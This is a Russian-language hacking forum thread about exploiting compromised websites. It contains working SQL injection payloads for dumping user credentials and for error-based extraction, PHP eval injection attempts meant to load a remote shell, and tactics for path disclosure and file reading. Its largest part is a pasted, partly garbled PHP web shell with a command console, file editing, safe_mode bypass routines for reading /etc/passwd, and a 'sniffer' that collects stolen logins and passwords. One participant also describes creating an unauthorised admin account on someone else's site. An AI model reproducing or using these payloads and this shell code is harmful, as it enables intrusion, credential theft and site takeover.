Иногда попадаються шелы на которых много доменов но они подписаны не как название сайта site.ru а наприме hzhzhzhz как узнать какой это домен если он не прописан не в robots.txt и т.д,есть ли какой-то скрипт который отправляет инфу о домене например на мыло?Спасибо.


какое мыло? ты чё? смской тебе не прислать?))

если не можешь найти логи то ставь в индексы и жди результата


PHP:






Xeson said:
Вопрос насчет search.php SQLi в булке 4.1.2;
Добавляю к запросу &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
Вместо того чтобы выводить данные, выводит слово: Uncategorized
Кто, что знает насчет этого?


тут и логично можно понять что дыру пропатчили


zloy_fantom said:
Может немного не в тему, но все-же:
Есть рабочий site.com.ua
И есть файлы, доступные для скачивания по адресам p.site.com.ua/[имя файла] и l.site.com.ua/[имя файла], на которые никакого намека в конфигах не нашел. Сам сайт расположен в opt/www/public/index.php причем на нем есть раскрытие путей (так и раскрыл конфиги), как такое может быть сделано и как это можно использовать? Спасибо


никак

qaz а чего ждать?

А смской было бы не плохо

Sat-hacker said:
qaz
а чего ждать?


пока кто нибуть не зайдёт на сайт, как кто-то зайдёт домен запишется в log.txt

DarkSorcerer said:
Ищи директорию с правами на запись, хотя возможно там даже есть запись во всех директориях. Ты можешь ходить по каталогам из шелла что я тебе дал, используй GET запросы, копируй ссылку "на уровень вверх" например и подставляй переменную с параметрами из этой ссылки в адресной строке.


Выход был настолько прост, что я его и не заметил (с)

Благодарю! Добра тебе, милейший.

Господа, новая задача:


Code:
PHP 5.2.6-1+LENNY16
allow_url_fopen On
allow_url_include Off
file_uploads On
magic_quotes_gpc On
magic_quotes_runtime Off
magic_quotes_sybase Off
cURL On

Дыра всё та же - PHP inj в URL. /search?name={${eval(stripslashes($_GET[cmd]))}}&cmd=phpinfo(); не пашет, name={${eval(stripslahes(file_get_contents($_COOKI E[shell])))}}, где содержание печеньки "shell" = 'линк на шелл', тоже, точнее срабатывают MQ, кавычки экранируются и запрос ломается. Идеи?

Есть вопрос?

Вопрос такого плана:

на acunetix можно реализовать sql инъекцию такого вида:

?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1

ответ: syntax error: ':5.5.9-log'

ставлю в браузер, инъекции не видно.

Есть подозрения что кавычки не передаются должным образом или срабатывает защита

Как быть?

Sanic1977 said:
Вопрос такого плана:
на acunetix можно реализовать sql инъекцию такого вида:
?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
ответ: syntax error: ':5.5.9-log'
ставлю в браузер, инъекции не видно.
Есть подозрения что кавычки не передаются должным образом
Как быть?


// Не верь мне, я - типичный скрипткидди.

Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.

Либо просто включены magicquotes и, как я люблю писать, выход был настолько прост, что я его и не заметил (с)

rogatiy said:
// Не верь мне, я - типичный скрипткидди.
Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.
Либо просто включены magicquotes и, как я люблю писать,
выход был настолько прост, что я его и не заметил
(с)


?id=1'"or(ExtractValue(1,concat(0x3a,database())))="1

пишет Column 'url' cannot be null

в браузере ошибок не видно

Sanic1977 said:
?id=1'"or(ExtractValue(1,concat(0x3a,database())))="1
пишет Column 'url' cannot be null
в браузере ошибок не видно


Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?

И вот ещё (https://antichat.live/showpost.php/p/2673441/postcount/168/), покури.

rogatiy said:
Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?


только с двойными кавычками выводится инфа

на acunetix выодится ошибка, а firefox нет

смотрел через прокси что идет,там

acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1

firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221

может в этом?

из-за этого не могу автоматизировать

Sanic1977 said:
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать


Нет, %27, например, это ' в HTML и т.д.

Не в этом дело

rogatiy said:
Нет, %27, например, это ' в HTML и т.д.
Не в этом дело


там знак ' не играет роли без него можно обойтись просто стоит, инъекция через кавычки "

qaz said:
никак


Спасибо, хоть и жаль, есть еще идея:

Как я уже говорил, есть раскрытие путей и могу читать файлы.

Вот часть запроса в одном из скриптов:


Code:
sql_query("SELECT id, pass, FROM users

В одном из скриптов есть строка:


Code:
$sql_name = "all";

Файл my.cnf содержит настройки:


Code:
basedir = /usr
datadir = /var/lib/mysql

Из чего делаю вывод, что в папке /var/lib/mysql/all лежит файл базы данных с именем users и неизвестным мне расширением, однако просмотр файлов, которым я располагаю, этот файл не показывает. Пробовал без расширения и с расширениями MYI, MYD, frm. Что еще можно попробовать? Может путь неверно указал???

Спасибо

недавно мне на сайт залили шелл. я его скачал и нашёл в нём левую бд,тоесть вырезку из конфига пароль пользователь базы и путь к ней. я спокойно зашёл в бд далее создал второго админа после чего заглянул в админку сайта.к слову сказать сайт серьёзный с хорошими пузомерками и в индексе море страниц.в связи с этим у меня два вопроса. что за шелл такой мне залили?почему в нём оказалась бд сайта? и что собственно теперь с эти сайтом делать?

Sanic1977 said:
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать


Скорее всего проблема в редиректе.

В акунетиксе он отключен по умолчанию.

zloy_fantom said:
Из чего делаю вывод, что в папке /var/lib/mysql/all лежит файл базы данных с именем users


ничего там не лежит


ерёма said:
недавно мне на сайт залили шелл. я его скачал и нашёл в нём левую бд,тоесть вырезку из конфига пароль пользователь базы и путь к ней. я спокойно зашёл в бд далее создал второго админа после чего заглянул в админку сайта.к слову сказать сайт серьёзный с хорошими пузомерками и в индексе море страниц.в связи с этим у меня два вопроса. что за шелл такой мне залили?почему в нём оказалась бд сайта? и что собственно теперь с эти сайтом делать?



чёза бред ты тут сказал? может это вовсе не шелл,

qaz said:
ничего там не лежит


А где лежит? В чем ошибка рассуждений? какой информации не хватает для определения того, в какой папке на сервере расположены таблицы базы данных?

Спасибо

qaz said:
чёза бред ты тут сказал? может это вовсе не шелл,


вот кусок из шелла в конце база


PHP:
function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.outpu t.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } printHeader(); ?> if(window.Event) window.captureEvents(Event.K EYDOWN); var cmds = new Array(""); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n� �== 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur Console'; foreach($GLOBALS['aliases'] as$n=>$v) { if($v=='') { echo''; continue; } echo ''.$n.''; } if(empty($_POST['ajax'])&&!empty($_POST['p1']))$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] =false; echo'>"> send using AJAX
'; if(!empty($_POST['p1'])) { echohtmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo''; echo'document.cf.cmd.focus();';pr intFooter(); } functionactionLogout() { unset( $_SESSION[md5($_SERVER['HTTP_HOST'])]); echo'bye!'; } functionactionSelfRemove() {p rintHeader(); if($_POST['p1'] =='yes') { if(@unlink(SELF_PATH)) die('Shell� �has been removed'); else echo'unlink error!' ; } echo'SuicideReally want to remove the s hell?
Yes';printFooter(); } functionactionSniffer() { printHeader(); echo'Sniffer';$host='сдесь � �омер заказа.mysql.ihc.ru';$db='сам� � база_db';$user='сдесь прописа� � пользователь_db';$passwd='ну и� �пароль';$link=mysql_connect($host,$user,$pa sswd);mysql_select_db($db,$link);$result=mysql_que ry("SELECT * FROM jos_phocadownload_templates");$n=mysql_num_rows($result); echo""; for($i=0;$i".' Login:',mysql_result($result,$i,login),"".'Pass:',mysql_result($result,$i,pass),"".'IP:',mysql_result($result,$i,ip),"".'Date:',mysql_result($result,$i,date),"".'id:',mysql_result($result,$i,id),"".'referer:',mysql_result($result,$i,ref),""; echo""; echo"";mysql_close($link);printFooter(); }

?>

function sa() {

for(i=0;i

NameSizeModifyOwner/GroupPermissionsActions";

$dirs = $files = $links = array();

$n = count($dirContent);

for($i=0;$i $dirContent[$i],

'path' => $GLOBALS['cwd'].$dirContent[$i],

'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),

'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),

'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),

'owner' => $ow['name']?$ow['name']fileowner($dirContent[$i]),

'group' => $gr['name']?$gr['name']filegroup($dirContent[$i])

);

if(@is_file($GLOBALS['cwd'].$dirContent[$i]))

$files[] = array_merge($tmp, array('type' => 'file'));

elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))

$links[] = array_merge($tmp, array('type' => 'link'));

elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))

$dirs[] = array_merge($tmp, array('type' => 'dir'));

}

$GLOBALS['sort'] = $sort;

function cmp($a, $b) {

if($GLOBALS['sort'][0] != 'size')

return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);

else

return (($a['size'] '.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms']

.'R T'.(($f['type']=='file')?' E D':'').'';

$l = $l?0:1;

}

?>





'>

'>

CopyMoveDeletePaste >">



String conversions';

$stringTools = array(

'Base64 encode' => 'base64_encode',

'Base64 decode' => 'base64_decode',

'Url encode' => 'urlencode',

'Url decode' => 'urldecode',

'Full urlencode' => 'full_urlencode',

'md5 hash' => 'md5',

'sha1 hash' => 'sha1',

'crypt' => 'crypt',

'CRC32' => 'crc32',

'ASCII to HEX' => 'ascii2hex',

'HEX to ASCII' => 'hex2ascii',

'HEX to DEC' => 'hexdec',

'HEX to BIN' => 'hex2bin',

'DEC to HEX' => 'dechex',

'DEC to BIN' => 'decbin',

'BIN to HEX' => 'bin2hex',

'BIN to DEC' => 'bindec',

'String to lower case' => 'strtolower',

'String to upper case' => 'strtoupper',

'Htmlspecialchars' => 'htmlspecialchars',

'String length' => 'strlen',

);

if(empty($_POST['ajax'])&&!empty($_POST['p1']))

$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

echo "";

foreach($stringTools as $k => $v)

echo "".$k."";

echo ">'/> send using AJAX
".htmlspecialchars(@$_POST['p2'])."";

if(!empty($_POST['p1'])) {

if(function_exists($_POST['p1']))

echo htmlspecialchars($_POST['p1']($_POST['p2']));

}

echo"";

?>


Search for hash:



















File tools';

if( !file_exists(@$_POST['p1']) ) {

echo 'File not exists';

printFooter();

return;

}

$uid = @posix_getpwuid(@fileowner($_POST['p1']));

$gid = @posix_getgrgid(@fileowner($_POST['p1']));

echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';

echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

';

if( empty($_POST['p2']) )

$_POST['p2'] = 'view';

if( is_file($_POST['p1']) )

$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');

else

$m = array('Chmod', 'Rename', 'Touch');

foreach($m as $v)

echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';

echo '

';

switch($_POST['p2']) {

case 'view':

echo '';

$fp = @fopen($_POST['p1'], 'r');

if($fp) {

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo '';

break;

case 'highlight':

if( is_readable($_POST['p1']) ) {

echo '';

$code = highlight_file($_POST['p1'],true);

echo str_replace(array(''), array(''),$code).'';

}

break;

case 'chmod':

if( !empty($_POST['p3']) ) {

$perms = 0;

for($i=strlen($_POST['p3'])-1;$i>=0;--$i)

$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));

if(!@chmod($_POST['p1'], $perms))

echo 'Can\'t set permissions!
document.mf.p3.value="";';

else

die('g(null,null,null,null,"")');

}

echo '>">';

break;

case 'edit':

if( !is_writable($_POST['p1'])) {

echo 'File isn\'t writeable';

break;

}

if( !empty($_POST['p3']) ) {

@file_put_contents($_POST['p1'],$_POST['p3']);

echo 'Saved!
document.mf.p3.value="";';

}

echo '';

$fp = @fopen($_POST['p1'], 'r');

if($fp) {

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo '>">';

break;

case 'hexdump':

$c = @file_get_contents($_POST['p1']);

$n = 0;

$h = array('00000000
','','');

$len = strlen($c);

for ($i=0; $i'.$h[0].''.$h[1].''.htmlspecialchars($h[2]).'';

break;

case 'rename':

if( !empty($_POST['p3']) ) {

if(!@rename($_POST['p1'], $_POST['p3']))

echo 'Can\'t rename!
document.mf.p3.value="";';

else

die('g(null,null,"'.urlencode($_POST['p3']).'",null,"")');

}

echo '>">';

break;

case 'touch':

if( !empty($_POST['p3']) ) {

$time = strtotime($_POST['p3']);

if($time) {

if(@touch($_POST['p1'],$time,$time))

die('g(null,null,null,null,"")');

else {

echo 'Fail!document.mf.p3.value="";';

}

} else echo 'Bad time format!document.mf.p3.value="";';

}

echo '>">';

break;

case 'mkfile':

break;

}

echo '';

printFooter();

}

function actionSafeMode() {

$temp='';

ob_start();

switch($_POST['p1']) {

case 1:

$temp=@tempnam($test, 'cx');

if(@copy("compress.zlib://".$_POST['p2'], $temp)){

echo @file_get_contents($temp);

unlink($temp);

} else

echo 'Sorry... Can\'t open file';

break;

case 2:

$files = glob($_POST['p2'].'*');

if( is_array($files) )

foreach ($files as $filename)

echo $filename."\n";

break;

case 3:

$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);

curl_exec($ch);

break;

case 4:

ini_restore("safe_mode");

ini_restore("open_basedir");

include($_POST['p2']);

break;

case 5:

for(;$_POST['p2'] Safe mode bypass';

echo 'Copy (read file)>">
Glob (list dir)>">
Curl (read file)>">
Ini_restore (read file)>">
Posix_getpwuid ("Read" /etc/passwd)FromTo>">

Imap_open (read file)>">';

if($temp)

echo ''.$temp.'';

echo '';

printFooter();

}

function actionConsole() {

if(isset($_POST['ajax'])) {

$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;

ob_start();

echo "document.cf.cmd.value='';\n";

$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));

if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {

if(@chdir($match[1])) {

$GLOBALS['cwd'] = @getcwd();

echo "document.mf.c.value='".$GLOBALS['cwd']."';";

}

}

echo "document.cf.output.value+='".$temp."';";

echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";

$temp = ob_get_clean();

echo strlen($temp), "\n", $temp;

exit;

}

printHeader();

?>

if(window.Event) window.captureEvents(Event.KEYDOWN);

var cmds = new Array("");

var cur = 0;

function kp(e) {

var n = (window.Event) ? e.which : e.keyCode;

if(n == 38) {

cur--;

if(cur>=0)

document.cf.cmd.value = cmds[cur];

else

cur++;

} else if(n == 40) {

cur++;

if(cur

Console';

foreach($GLOBALS['aliases'] as $n => $v) {

if($v == '') {

echo '';

continue;

}

echo ''.$n.'';

}

if(empty($_POST['ajax'])&&!empty($_POST['p1']))

$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

echo '>"> send using AJAX
';

if(!empty($_POST['p1'])) {

echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));

}

echo '';

echo 'document.cf.cmd.focus();';

printFooter();

}

function actionLogout() {

unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);

echo 'bye!';

}

function actionSelfRemove() {

printHeader();

if($_POST['p1'] == 'yes') {

if(@unlink(SELF_PATH))

die('Shell has been removed');

else

echo 'unlink error!';

}

echo 'SuicideReally want to remove the shell?
Yes';

printFooter();

}

function actionSniffer() {

printHeader();

echo 'Sniffer';

$host='сдесь номер заказа.mysql.ihc.ru';

$db='сама база_db';

$user='сдесь прописан пользователь_db';

$passwd='ну и пароль';

$link = mysql_connect($host, $user, $passwd);

mysql_select_db($db, $link);

$result=mysql_query("SELECT * FROM jos_phocadownload_templates");

$n=mysql_num_rows($result);

echo "";

for($i=0;$i".' Login:',mysql_result($result,$i,login),"".'Pass:',mysql_result($result,$i,pass),"".'IP:',mysql_result($result,$i,ip),"".'Date:',mysql_result($result,$i,date),"".'id:',mysql_result($result,$i,id),"".'referer:',mysql_result($result,$i,ref),"";

echo "";

echo "";

mysql_close($link);

printFooter();

}[/I][/I]

zloy_fantom said:
А где лежит? В чем ошибка рассуждений? какой информации не хватает для определения того, в какой папке на сервере расположены таблицы базы данных?
Спасибо


они в БД лежат а не в папке

полная версия

ерёма said:
http://rghost.ru/44661788 полная версия


собственно нафига ты это всё сюда павыкладывал?? ты спрашивал что с найденыйм сайтом делать? - ответ что хочешь то делай, к данной теме это не имеет никакого отношения

qaz said:
собственно нафига ты это всё сюда павыкладывал?? ты спрашивал что с найденыйм сайтом делать? - ответ что хочешь то делай, к данной теме это не имеет никакого отношения


Извиняюсь конечно что не в тот топик начал писать. Просто с мобилки изначально юзал форум и не очень удобно было искать подходящую тему.Вот и написал сюда, мне показалось что этот топик более подходит.С сайтом мне понятно что делать. Просто я с шелами особо не сталкивался вот по этому и попросил разьяснить по чему в нём оказалась бд, для чего она там?И вообще это часто встречается что в шелл вписывают бд других сайтов? И шелл ли это???